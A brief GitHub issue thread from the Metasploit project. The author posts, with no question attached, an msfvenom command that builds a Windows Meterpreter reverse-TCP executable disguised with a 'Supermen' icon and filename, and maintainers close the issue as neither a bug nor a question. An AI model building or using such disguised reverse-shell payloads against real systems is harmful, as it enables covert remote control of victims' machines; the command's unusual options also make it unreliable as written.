### ISSUE TITLE
its not um bug only one question!? 

### ISSUE THREAD

**Issue by GreenEYESSS** [rapid7/metasploit-framework#12743]
```msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=7777 {STARTUP=SYSTEM,USER,SERVICE}  ICO=C:/FAKE/Download/Supermen.ico -f exe > SuperMen.exe```

**Comment by wvu-r7** [comment]
That is not a question.

**Comment by bcoles** [comment]
> 
> 
> That is not a question.

Good catch.

It is neither um bug nor a question. Closing.
